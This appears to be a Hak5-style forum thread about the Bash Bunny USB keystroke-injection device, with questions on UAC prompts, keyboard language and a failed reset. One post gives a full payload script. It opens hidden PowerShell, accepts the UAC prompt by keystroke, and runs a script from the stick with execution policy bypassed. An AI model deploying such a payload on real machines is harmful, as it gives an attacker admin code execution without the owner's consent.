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  1. Just UAC not working.... The UAC in the first window askd the my credential (I am admin, no need to enter my credential), next windows asked CTRL + ALT + DEL to enter my credential and the third windows shows Run powershell as admin... Do you know which commands i need?
  2. I have changed the language to DE, and it is working.
  3. Hi, My case is want to run Powershell as admin but bunny language is not working on UAC. Payload.txt file look like bellow and my UAC setting is like the link i added the end of the post: #!/bin/bash # Options LOOTDIR=/root/udisk/loot/badmin ######## INITIALIZATION ######## LED SETUP GET SWITCH_POSITION ATTACKMODE HID STORAGE ######## MAKE LOOT DIRECTORY ######## mkdir -p $LOOTDIR ######## ATTACK ######## LED ATTACK RUN WIN "powershell -windowstyle hidden start-process powershell -verb RunAs" sleep 3 Q ALT Y sleep 2 Q STRING "\$src = (gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch1\p.ps1'" Q ENTER sleep 1 QUACK STRING "powershell -ep bypass \$src" Q ENTER Q STRING "exit" Q ENTER ######## FINISH ######## LED FINISH ------------------------------------------------------ My UAC setting is like described here (se the screenshoots in the article): https://www.tenforums.com/tutorials/112476-enable-ctrl-alt-delete-secure-desktop-uac-prompt-windows.html
  4. Hi Dark_Pyrro, Thanks your replay. I have fixed that, reset is not working but i did frimware update and BB is working currectly now.
  5. Hello, Can someone help me? I wanted to reset my BB mark 2 and followed the BB instruction but my BB on the 4th boot just flashes blue and red and won't turn to green. Below is what I have done: Switch in arming mode Plug in (1) Wait until the first LED turns off Pull out Plug in (2) Wait until the first LED turns off Pull out Plug in (3) Wait until the first LED turns off Pull out Plug in (4) Leave it After that, the BB just flashes red and blue, doesn't light up green. So I can't use BB anymore. Can someone help me?
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